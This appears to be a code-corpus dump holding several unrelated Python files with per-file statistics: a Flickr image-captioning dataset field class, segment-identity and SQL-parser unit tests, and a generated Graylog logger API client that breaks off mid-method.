'MNR': 10, 'TMP': 11, 'EXT': 12, 'REC': 13, 'PRD': 14, 'PRP': 15, 'CAU': 16, 'DIS': 17, 'ADV': 18,
'ADJ': 19, 'MOD': 20, 'NEG': 21, 'LVB': 22, 'PNC': 23, 'COM': 24, 'V': 25}
super(FlickrControlSetField_Verb, self).__init__(None, postprocessing)
@staticmethod
def _bb_intersection_over_union(boxA, boxB):
xA = max(boxA[0], boxB[0])
yA = max(boxA[1], boxB[1])
xB = min(boxA[2], boxB[2])
yB = min(boxA[3], boxB[3])
interArea = max(0, xB - xA + 1) * max(0, yB - yA + 1)
boxAArea = (boxA[2] - boxA[0] + 1) * (boxA[3] - boxA[1] + 1)
boxBArea = (boxB[2] - boxB[0] + 1) * (boxB[3] - boxB[1] + 1)
iou = interArea / (boxAArea + boxBArea - interArea)
return iou
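# Quick sanity check for the IoU helper above (hypothetical boxes): identical
# boxes give 1.0 and disjoint boxes give 0.0, e.g.
#   _bb_intersection_over_union([0, 0, 10, 10], [0, 0, 10, 10])   # -> 1.0
#   _bb_intersection_over_union([0, 0, 10, 10], [20, 20, 30, 30]) # -> 0.0
# (the +1 terms treat coordinates as inclusive pixel indices)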
def preprocess(self, x):
image = x[0][0]
caption = x[0][1]
gt_bboxes = x[1]
id_image = image.split('/')[-1].split('.')[0]
if self.visual:
try:
with h5py.File(self.detections_path, 'r') as f:
det_cls_probs = f['%s_cls_prob' % id_image][()]
det_features = f['%s_features' % id_image][()]
det_bboxes = f['%s_boxes' % id_image][()]
except KeyError:
warnings.warn('Could not find detections for %s' % id_image)
# fall back to random placeholders so preprocessing can proceed
det_cls_probs = np.random.rand(10, 2048)
det_features = np.random.rand(10, 2048)
det_bboxes = np.random.rand(10, 4)
idx_2_verb = self.idx_2_vs[id_image][caption]['verb'] # verb&num
idx_2_v_og = self.idx_2_v_og[id_image][caption]
idx_2_sr = self.idx_2_vs[id_image][caption]['sr'] # sr_idx
cap_2_verb = self.cap_2_verb[id_image][caption] # verb
cls_seq = self.cap_2_classes[id_image][caption]
cls_seq = [x - 1 for x in cls_seq]  # shift every index down by one, so verb markers go from -1 to -2
if self.visual:
selected_classes = [self.classes[np.argmax(det_cls_probs[i][1:]) + 1] for i in range(len(det_cls_probs))]
width, height = self.img_shapes[str(id_image)]
# visual feature
pooled_feat = np.mean(det_features, axis=0)
det_sequences_visual_all = np.zeros((self.fix_length, self.max_detections, det_features.shape[-1]))
det_sequences_visual = np.zeros((self.fix_length, det_features.shape[-1]))
det_sequences_word = np.zeros((self.fix_length, 300))
det_sequences_position = np.zeros((self.fix_length, 4))
# semantic role feature
det_sequences_sr = np.zeros((self.fix_length, 8))
det_sequences_verb = np.zeros((self.fix_length, 8))
gt_det_sequences_sr = np.zeros((self.fix_length, 8))
gt_det_sequences_verb = np.zeros((self.fix_length, 8))
control_verb = np.zeros(8)
for j, verb in enumerate(cap_2_verb):
if j >= 8:
continue
control_verb[j] = self.flickr_verb_idx[verb.split('_')[0]] + 1 \
+ 10000 * int(verb.split('_')[-1])  # 0 means no verb
# non-verb positions stay -1; verb positions hold the verb's index
verb_list = np.full((self.fix_length, 1), -1.0)
verb_list_og = np.full((self.fix_length, 1), -1.0)
idx_list = np.full((self.fix_length, 1), -1.0)
cls_seq = cls_seq[:self.fix_length]  # keep only the first fix_length entries
for j, cls_ in enumerate(cls_seq):
for k, sr in enumerate(idx_2_sr[j]):
if idx_2_verb[j][k] in cap_2_verb:
gt_det_sequences_sr[j, k] = sr  # 0 is the padding value
gt_det_sequences_verb[j, k] = self.flickr_verb_idx[idx_2_verb[j][k].split('_')[0]] + 1 \
+ 10000 * int(idx_2_verb[j][k].split('_')[-1])  # 0 means no verb
# randomly shuffle the class sequence, keeping track of the original positions
idx_rank = list(range(self.fix_length))
rank_use = list(zip(cls_seq, idx_rank))
random.shuffle(rank_use)
cls_seq, idx_list_ = zip(*rank_use)
idx_list_ = np.array(idx_list_)
idx_list[:len(idx_list_), :] = idx_list_[:, np.newaxis]
for j, cls in enumerate(cls_seq):
if self.visual:
if cls >= 0:
iou_max_max = 0
only_box = -1
id_boxes = []
for k, bbox in enumerate(gt_bboxes[cls]):
id_bbox = -1
iou_max = 0
# pick the detection box with the highest IoU against this gt box
for ii, det_bbox in enumerate(det_bboxes):
iou = self._bb_intersection_over_union(bbox, det_bbox)
if iou_max < iou:
id_bbox = ii
iou_max = iou
if iou_max_max < iou_max:
only_box = id_bbox
iou_max_max = iou_max
id_boxes.append(id_bbox)
id_boxes.sort()
det_sequences_visual_all[j, 0] = det_features[only_box]
det_sequences_visual[j] = det_features[only_box]
bbox = det_bboxes[only_box]
det_sequences_position[j, 0] = (bbox[0] + bbox[2]) / 2 / width  # normalized center x
det_sequences_position[j, 1] = (bbox[1] + bbox[3]) / 2 / height  # normalized center y
det_sequences_position[j, 2] = (bbox[2] - bbox[0]) / width  # normalized width
det_sequences_position[j, 3] = (bbox[3] - bbox[1]) / height  # normalized height
else:
det_sequences_visual_all[j, 0] = pooled_feat
if idx_2_verb[int(idx_list[j][0])] != [] and idx_2_verb[int(idx_list[j][0])][0].split('_')[0] in self.flickr_verb_idx:
verb_list[j, :] = \
self.flickr_verb_idx[idx_2_verb[int(idx_list[j][0])][0].split('_')[0]] + 1
if idx_2_v_og[int(idx_list[j][0])][0] in self.vocab_2_idx:
verb_list_og[j, :] = \
self.vocab_2_idx[idx_2_v_og[int(idx_list[j][0])][0]]
else:
verb_list_og[j, :] = 0
for k, sr in enumerate(idx_2_sr[int(idx_list[j][0])]):
if idx_2_verb[int(idx_list[j][0])][k] in cap_2_verb:
det_sequences_sr[j, k] = sr
det_sequences_verb[j, k] = self.flickr_verb_idx[idx_2_verb[int(idx_list[j][0])][k].split('_')[0]] + 1 \
+ 10000 * int(idx_2_verb[int(idx_list[j][0])][k].split('_')[-1])
if self.gt_verb:
if self.visual:
return det_sequences_word.astype(np.float32), det_sequences_visual.astype(np.float32), \
det_sequences_position.astype(np.float32), det_sequences_visual_all.astype(np.float32), \
det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), control_verb.astype(np.float32), \
gt_det_sequences_verb.astype(np.float32), gt_det_sequences_sr.astype(np.float32), idx_list, verb_list_og
else:
return det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), control_verb.astype(np.float32), \
gt_det_sequences_verb.astype(np.float32), gt_det_sequences_sr.astype(np.float32), idx_list, verb_list_og
else:
if self.visual:
return det_sequences_word.astype(np.float32), det_sequences_visual.astype(np.float32), \
det_sequences_position.astype(np.float32), det_sequences_visual_all.astype(np.float32), \
det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), control_verb.astype(np.float32), \
gt_det_sequences_verb.astype(np.float32), gt_det_sequences_sr.astype(np.float32), idx_list, verb_list
else:
return det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), control_verb.astype(np.float32), \
gt_det_sequences_verb.astype(np.float32), gt_det_sequences_sr.astype(np.float32), idx_list, verb_list
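# Sketch of the packed verb encoding used above (hypothetical indices): a token
# such as 'run_2' with flickr_verb_idx['run'] == 7 is stored as
#   (7 + 1) + 10000 * 2 == 20008
# i.e. the verb id (offset by 1, since 0 means "no verb") plus 10000 times its
# occurrence number within the caption.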
class FlickrDetSetField_Verb(RawField):
def __init__(self, postprocessing=None, verb_idx_path=None, verb_vob_path=None, idbox_seq_path=None,
vocab_list_path=None, vlem_2_verb_og_path=None, detections_path=None, classes_path=None,
img_shapes_path=None, precomp_glove_path=None, fix_length=20, max_detections=20,
visual=True, gt_verb=False):
self.fix_length = fix_length
self.detections_path = detections_path
self.max_detections = max_detections
self.visual = visual
self.gt_verb = gt_verb
self.classes = ['__background__']
with open(classes_path, 'r') as f:
for line in f.readlines():
self.classes.append(line.split(',')[0].lower().strip())
with open(precomp_glove_path, 'rb') as fp:
self.vectors = pkl.load(fp)
with open(img_shapes_path, 'r') as fp:
self.img_shapes = json.load(fp)
with open(verb_idx_path) as f:
self.flickr_verb_idx = json.load(f)
with open(verb_vob_path) as f:
self.verb_2_vob = json.load(f)
with open(idbox_seq_path) as f:
self.img_cap_v_2_idbox = json.load(f)
with open(vocab_list_path) as f:
vocab_list = json.load(f)
self.vocab_2_idx = {}
for idx, vocab in enumerate(vocab_list):
self.vocab_2_idx[vocab] = idx
with open(vlem_2_verb_og_path) as f:
self.vlem_2_verb = json.load(f)
self.sr_2_idx = {'ARG0': 1, 'ARG1': 2, 'ARG2': 3, 'ARG3': 4, 'ARG4': 5, 'ARG5': 6, 'LOC': 7, 'DIR': 8, 'GOL': 9,
'MNR': 10, 'TMP': 11, 'EXT': 12, 'REC': 13, 'PRD': 14, 'PRP': 15, 'CAU': 16, 'DIS': 17, 'ADV': 18,
'ADJ': 19, 'MOD': 20, 'NEG': 21, 'LVB': 22, 'PNC': 23, 'COM': 24, 'V': 25}
super(FlickrDetSetField_Verb, self).__init__(None, postprocessing)
def preprocess(self, x):
image = x[0][0]
caption = x[0][1]
gt_bboxes = x[1]
id_image = image.split('/')[-1].split('.')[0]
try:
with h5py.File(self.detections_path, 'r') as f:
det_cls_probs = f['%s_cls_prob' % id_image][()]
det_features = f['%s_features' % id_image][()]
det_bboxes = f['%s_boxes' % id_image][()]
except KeyError:
warnings.warn('Could not find detections for %s' % id_image)
# fall back to random placeholders so preprocessing can proceed
det_cls_probs = np.random.rand(10, 2048)
det_features = np.random.rand(10, 2048)
det_bboxes = np.random.rand(10, 4)
v_2_class = self.img_cap_v_2_idbox[id_image][caption]
vlem_2_verb = self.vlem_2_verb[id_image][caption]
loc_2_verb = {}
loc_2_sr = {}
loc = 0
idbox_seq = {}
cap_2_verb = []
for verb in v_2_class:
for sr in v_2_class[verb]:
for id_box in v_2_class[verb][sr]:
if verb not in cap_2_verb:
cap_2_verb.append(verb)
if id_box not in idbox_seq:
idbox_seq[id_box] = loc
loc += 1
control_verb = np.zeros(8)
for j, verb in enumerate(cap_2_verb):
if j >= 8:
continue
control_verb[j] = self.flickr_verb_idx[verb.split('_')[0]] + 1  # 0 means no verb
for verb in v_2_class:
for sr in v_2_class[verb]:
for id_box in v_2_class[verb][sr]:
loc_ = idbox_seq[id_box]
loc_2_verb.setdefault(loc_, []).append(verb)
loc_2_sr.setdefault(loc_, []).append(sr)
# append one slot per verb at the end of the sequence
for verb in cap_2_verb:
idbox_seq[-1] = loc  # -1 means no box (a verb slot)
loc_2_verb.setdefault(loc, []).append(verb)
loc_2_sr.setdefault(loc, []).append(25)  # 25 is the 'V' semantic-role index
loc += 1
width, height = self.img_shapes[str(id_image)]
# visual feature
pooled_feat = np.mean(det_features, axis=0)
selected_classes = [self.classes[np.argmax(det_cls_probs[i][1:]) + 1] for i in range(len(det_cls_probs))]
det_sequences_visual_all = np.zeros((self.fix_length, self.max_detections, det_features.shape[-1]))
det_sequences_visual = np.zeros((self.fix_length, det_features.shape[-1]))
det_sequences_word = np.zeros((self.fix_length, 300))
det_sequences_position = np.zeros((self.fix_length, 4))
# semantic role feature
det_sequences_sr = np.zeros((self.fix_length, 8))
det_sequences_verb = np.zeros((self.fix_length, 8))
# non-verb positions stay -1; verb positions hold the verb's index
verb_list = np.full((self.fix_length, 1), -1.0)
for j, idbox in enumerate(idbox_seq):
if j == 10:  # only the first 10 slots are used
break
if idbox >= 0:
det_sequences_visual_all[j, 0] = det_features[idbox]  # feature of the current class's region
det_sequences_visual[j] = det_features[idbox]  # feature of the first region of the current class
cls_w = selected_classes[idbox].split(',')[0].split(' ')[-1]
if cls_w in self.vectors:
det_sequences_word[j] = self.vectors[cls_w]
bbox = det_bboxes[idbox]  # box of the first region of the current class (x1, y1, x2, y2)
det_sequences_position[j, 0] = (bbox[0] + bbox[2]) / 2 / width  # normalized center x
det_sequences_position[j, 1] = (bbox[1] + bbox[3]) / 2 / height  # normalized center y
det_sequences_position[j, 2] = (bbox[2] - bbox[0]) / width  # normalized width
det_sequences_position[j, 3] = (bbox[3] - bbox[1]) / height  # normalized height
else:
det_sequences_visual_all[j, 0] = pooled_feat
# the trailing slots carry the verb index
if loc_2_verb[j] != []:
if self.gt_verb is False:
verb_list[j, :] = self.flickr_verb_idx[loc_2_verb[j][0].split('_')[0]] + 1
else:
for v_lem, verb_og in vlem_2_verb:
if v_lem == loc_2_verb[j][0].split('_')[0]:
if verb_og in self.vocab_2_idx:
verb_list[j, :] = self.vocab_2_idx[verb_og]
break
for k, sr in enumerate(loc_2_sr[j]):
if k >= 8:
continue
det_sequences_sr[j, k] = sr  # 0 is the padding value
det_sequences_verb[j, k] = self.flickr_verb_idx[loc_2_verb[j][k].split('_')[0]] + 1  # 0 is the padding value
return det_sequences_word.astype(np.float32), det_sequences_visual.astype(np.float32), \
det_sequences_position.astype(np.float32), det_sequences_visual_all.astype(np.float32), \
det_sequences_verb.astype(np.float32), det_sequences_sr.astype(np.float32), control_verb.astype(np.float32), \
verb_list
| 47.273381
| 148
| 0.574433
| 9,063
| 65,710
| 3.875648
| 0.036191
| 0.080285
| 0.043559
| 0.027502
| 0.917637
| 0.910918
| 0.891388
| 0.88168
| 0.872342
| 0.865082
| 0
| 0.037445
| 0.297291
| 65,710
| 1,389
| 149
| 47.307415
| 0.723249
| 0.032689
| 0
| 0.837084
| 0
| 0
| 0.026473
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023402
| false
| 0
| 0.010801
| 0
| 0.063906
| 0.0009
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22e491ae56f387d29d5930346fe5fefe51615eab
| 4,736
|
py
|
Python
|
tests/test_segment_identity_daily.py
|
GlobalFishingWatch/pipe-segment
|
4992719d9244901baed7c5db88f434cb87ebb179
|
[
"Apache-2.0"
] | null | null | null |
tests/test_segment_identity_daily.py
|
GlobalFishingWatch/pipe-segment
|
4992719d9244901baed7c5db88f434cb87ebb179
|
[
"Apache-2.0"
] | 65
|
2017-09-26T23:59:14.000Z
|
2022-02-14T12:48:25.000Z
|
tests/test_segment_identity_daily.py
|
GlobalFishingWatch/pipe-segment
|
4992719d9244901baed7c5db88f434cb87ebb179
|
[
"Apache-2.0"
] | 2
|
2019-04-18T20:37:10.000Z
|
2022-03-15T15:28:36.000Z
|
from pipe_tools.utils.timestamp import as_timestamp
from pipe_segment.segment_identity.transforms import summarize_identifiers
class TestSegmentIdentityDaily:
def test_summarize_identifiers_no_empties(self):
segment = {
"seg_id": u'338013000-2017-07-20T05:59:35.000000Z',
"ssvid": u'338013000',
"timestamp": as_timestamp('2018-01-01T00:00:00.000000Z'),
"first_msg_of_day_timestamp": as_timestamp('2018-01-01T01:00:00.000000Z'),
"last_msg_of_day_timestamp": as_timestamp('2018-01-01T02:00:00.000000Z'),
"message_count": 100,
"transponders": [
{ "value": u"338013000", "count": 90 },
{ "value": u"338013001", "count": 20 }
],
"shipnames": [
{ "value": u"", "count": 90 },
{ "value": u"f/v boaty Mc Boatface", "count": 30 }
],
"callsigns": [
{ "value": u"", "count": 90 },
{ "value": u"@@123", "count": 40 }
],
"imos": [
{ "value": u"0", "count": 90 },
{ "value": u"8875956", "count": 50 }
]
}
result = summarize_identifiers(segment)
assert result == {
"seg_id": u'338013000-2017-07-20T05:59:35.000000Z',
"ssvid": u'338013000',
"timestamp": as_timestamp('2018-01-01T00:00:00.000000Z'),
"first_timestamp": as_timestamp('2018-01-01T01:00:00.000000Z'),
"last_timestamp": as_timestamp('2018-01-01T02:00:00.000000Z'),
"first_pos_timestamp": as_timestamp('2018-01-01T01:00:00.000000Z'),
"last_pos_timestamp": as_timestamp('2018-01-01T02:00:00.000000Z'),
"msg_count": 100,
"pos_count": 110,
"ident_count": 120,
"shipname": [
{ "value": u"", "count": 90 },
{ "value": u"f/v boaty Mc Boatface", "count": 30 }
],
"callsign": [
{ "value": u"", "count": 90 },
{ "value": u"@@123", "count": 40 }
],
"imo": [
{ "value": u"0", "count": 90 },
{ "value": u"8875956", "count": 50 }
],
"n_shipname": [
{ "value": u"BOATYMCBOATFACE", "count": 30 }
],
"n_callsign": [
{ "value": u"123", "count": 40 }
],
"n_imo": [
{ "value": u"8875956", "count": 50 }
],
"shiptype": None,
"length": None,
"width": None,
"noise": False
}
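# The expectations above encode the summarization rules as exercised by these
# fixtures: pos_count is the sum of transponder counts (90 + 20), ident_count
# is the sum of shipname counts (90 + 30), and the n_* fields hold normalized
# identifiers with empty/zero values dropped (e.g. "f/v boaty Mc Boatface"
# -> "BOATYMCBOATFACE").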
def test_summarize_identifiers_empty_identifiers(self):
segment = {
"seg_id": u'338013000-2017-07-20T05:59:35.000000Z',
"ssvid": u'338013000',
"timestamp": as_timestamp('2018-01-01T00:00:00.000000Z'),
"first_msg_of_day_timestamp": as_timestamp('2018-01-01T01:00:00.000000Z'),
"last_msg_of_day_timestamp": as_timestamp('2018-01-01T02:00:00.000000Z'),
"message_count": 100,
"transponders": [
{ "value": u"338013000", "count": 90 },
{ "value": u"338013001", "count": 20 }
],
"shipnames": [
{ "value": u"", "count": 90 },
],
"callsigns": [
{ "value": u"", "count": 90 },
],
"imos": [
{ "value": u"0", "count": 90 },
]
}
result = summarize_identifiers(segment)
assert result == {
"seg_id": u'338013000-2017-07-20T05:59:35.000000Z',
"ssvid": u'338013000',
"timestamp": as_timestamp('2018-01-01T00:00:00.000000Z'),
"first_timestamp": as_timestamp('2018-01-01T01:00:00.000000Z'),
"last_timestamp": as_timestamp('2018-01-01T02:00:00.000000Z'),
"first_pos_timestamp": as_timestamp('2018-01-01T01:00:00.000000Z'),
"last_pos_timestamp": as_timestamp('2018-01-01T02:00:00.000000Z'),
"msg_count": 100,
"pos_count": 110,
"ident_count": 90,
"shipname": [
{ "value": u"", "count": 90 },
],
"callsign": [
{ "value": u"", "count": 90 },
],
"imo": [
{ "value": u"0", "count": 90 },
],
"n_shipname": None,
"n_callsign": None,
"n_imo": None,
"shiptype": None,
"length": None,
"width": None,
"noise": False
}
| 36.713178
| 86
| 0.464105
| 469
| 4,736
| 4.522388
| 0.176972
| 0.070721
| 0.150872
| 0.181047
| 0.842999
| 0.784064
| 0.764262
| 0.764262
| 0.725601
| 0.698256
| 0
| 0.206376
| 0.370777
| 4,736
| 128
| 87
| 37
| 0.505369
| 0
| 0
| 0.806723
| 0
| 0
| 0.337698
| 0.144034
| 0
| 0
| 0
| 0
| 0.016807
| 1
| 0.016807
| false
| 0
| 0.033613
| 0
| 0.058824
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
22fd1309505c4735956fb977e9b5751a4292d7ab
| 46
|
py
|
Python
|
native/libcst/tests/fixtures/indents_but_no_eol_before_eof.py
|
jschavesr/LibCST
|
e5ab7b90b4c9cd1f46e5b875ad317411abf48298
|
[
"Apache-2.0"
] | 880
|
2019-08-07T21:21:11.000Z
|
2022-03-29T06:25:34.000Z
|
native/libcst/tests/fixtures/indents_but_no_eol_before_eof.py
|
jschavesr/LibCST
|
e5ab7b90b4c9cd1f46e5b875ad317411abf48298
|
[
"Apache-2.0"
] | 537
|
2019-08-08T18:34:30.000Z
|
2022-03-30T16:46:14.000Z
|
native/libcst/tests/fixtures/indents_but_no_eol_before_eof.py
|
jschavesr/LibCST
|
e5ab7b90b4c9cd1f46e5b875ad317411abf48298
|
[
"Apache-2.0"
] | 108
|
2019-08-08T00:17:21.000Z
|
2022-03-24T20:53:31.000Z
|
if 1:
if 2:
if 3:
pass
| 11.5
| 16
| 0.282609
| 7
| 46
| 1.857143
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1875
| 0.652174
| 46
| 4
| 16
| 11.5
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
a3aefcd9bba065c2a8d8ad476237b25d221c1da6
| 1,644
|
py
|
Python
|
tests/formats/mysql/file_reader/parsers/test_insert_values.py
|
cmancone/mygrations
|
30d1d568ca7d6c38dbc5211834dd2d04c0bcf078
|
[
"MIT"
] | 10
|
2018-04-09T08:39:42.000Z
|
2022-03-14T15:36:05.000Z
|
tests/formats/mysql/file_reader/parsers/test_insert_values.py
|
cmancone/mygrations
|
30d1d568ca7d6c38dbc5211834dd2d04c0bcf078
|
[
"MIT"
] | 14
|
2018-05-02T11:14:08.000Z
|
2022-01-15T18:48:54.000Z
|
tests/formats/mysql/file_reader/parsers/test_insert_values.py
|
cmancone/mygrations
|
30d1d568ca7d6c38dbc5211834dd2d04c0bcf078
|
[
"MIT"
] | 5
|
2018-07-18T02:20:48.000Z
|
2022-02-19T09:32:07.000Z
|
import unittest
from mygrations.formats.mysql.file_reader.parsers.insert_values import insert_values
class test_insert_values(unittest.TestCase):
def test_simple(self):
# parse typical insert values
parser = insert_values()
returned = parser.parse("( 'name', 'bob', 'okay', 1),")
# we should have matched
self.assertTrue(parser.matched)
# and we should have some data now
self.assertEqual('', returned)
# all we really have is the list of values
self.assertEqual(['name', 'bob', 'okay', '1'], parser.values)
self.assertTrue(parser.has_comma)
def test_optional_comma(self):
# parse typical insert values
parser = insert_values()
returned = parser.parse("('name', 'bob', 'okay', 1)")
# we should have matched
self.assertTrue(parser.matched)
# and we should have some data now
self.assertEqual('', returned)
# all we really have is the list of values
self.assertEqual(['name', 'bob', 'okay', '1'], parser.values)
self.assertFalse(parser.has_comma)
def test_return(self):
# parse typical insert values
parser = insert_values()
returned = parser.parse("('name','bob','okay',1), ('name','bob')")
# we should have matched
self.assertTrue(parser.matched)
# and we should have some data now
self.assertEquals("('name','bob')", returned)
# all we really have is the list of values
self.assertEquals(['name', 'bob', 'okay', '1'], parser.values)
self.assertTrue(parser.has_comma)
| 31.615385
| 84
| 0.61983
| 199
| 1,644
| 5.045226
| 0.231156
| 0.10757
| 0.065737
| 0.071713
| 0.819721
| 0.791833
| 0.791833
| 0.791833
| 0.791833
| 0.791833
| 0
| 0.004914
| 0.257299
| 1,644
| 51
| 85
| 32.235294
| 0.817363
| 0.227494
| 0
| 0.541667
| 0
| 0
| 0.117741
| 0.019093
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.125
| false
| 0
| 0.083333
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a3c827d058869d5d1d8b1308c77d64c23c43d3e2
| 13,911
|
py
|
Python
|
graylog/apis/clustersystemloggers_api.py
|
yumimobi/graylog.py
|
3118f4a49c91c2cbbd660523b0ab99e56fbfd861
|
[
"Apache-2.0"
] | 10
|
2016-09-27T08:13:22.000Z
|
2018-09-04T13:15:42.000Z
|
graylog/apis/clustersystemloggers_api.py
|
yumimobi/graylog.py
|
3118f4a49c91c2cbbd660523b0ab99e56fbfd861
|
[
"Apache-2.0"
] | 1
|
2019-08-28T16:16:09.000Z
|
2019-08-28T16:16:09.000Z
|
graylog/apis/clustersystemloggers_api.py
|
yumimobi/graylog.py
|
3118f4a49c91c2cbbd660523b0ab99e56fbfd861
|
[
"Apache-2.0"
] | 5
|
2016-11-03T07:45:18.000Z
|
2021-08-19T14:21:49.000Z
|
# coding: utf-8
"""
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.1.1+01d50e5
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class ClustersystemloggersApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def loggers(self, **kwargs):
"""
List all loggers of all nodes and their current levels
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.loggers(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: Map
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.loggers_with_http_info(**kwargs)
else:
(data) = self.loggers_with_http_info(**kwargs)
return data
def loggers_with_http_info(self, **kwargs):
"""
List all loggers of all nodes and their current levels
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.loggers_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: Map
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method loggers" % key
)
params[key] = val
del params['kwargs']
resource_path = '/cluster/system/loggers'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Map',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def set_subsystem_logger_level(self, node_id, subsystem, level, **kwargs):
"""
Set the loglevel of a whole subsystem
Provided level is falling back to DEBUG if it does not exist
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.set_subsystem_logger_level(node_id, subsystem, level, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Object node_id: (required)
:param Object subsystem: (required)
:param Object level: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.set_subsystem_logger_level_with_http_info(node_id, subsystem, level, **kwargs)
else:
(data) = self.set_subsystem_logger_level_with_http_info(node_id, subsystem, level, **kwargs)
return data
def set_subsystem_logger_level_with_http_info(self, node_id, subsystem, level, **kwargs):
"""
Set the loglevel of a whole subsystem
Provided level is falling back to DEBUG if it does not exist
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.set_subsystem_logger_level_with_http_info(node_id, subsystem, level, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Object node_id: (required)
:param Object subsystem: (required)
:param Object level: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['node_id', 'subsystem', 'level']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_subsystem_logger_level" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'node_id' is set
if ('node_id' not in params) or (params['node_id'] is None):
raise ValueError("Missing the required parameter `node_id` when calling `set_subsystem_logger_level`")
# verify the required parameter 'subsystem' is set
if ('subsystem' not in params) or (params['subsystem'] is None):
raise ValueError("Missing the required parameter `subsystem` when calling `set_subsystem_logger_level`")
# verify the required parameter 'level' is set
if ('level' not in params) or (params['level'] is None):
raise ValueError("Missing the required parameter `level` when calling `set_subsystem_logger_level`")
resource_path = '/cluster/system/loggers/{nodeId}/subsystems/{subsystem}/level/{level}'.replace('{format}', 'json')
path_params = {}
if 'node_id' in params:
path_params['nodeId'] = params['node_id']
if 'subsystem' in params:
path_params['subsystem'] = params['subsystem']
if 'level' in params:
path_params['level'] = params['level']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = []
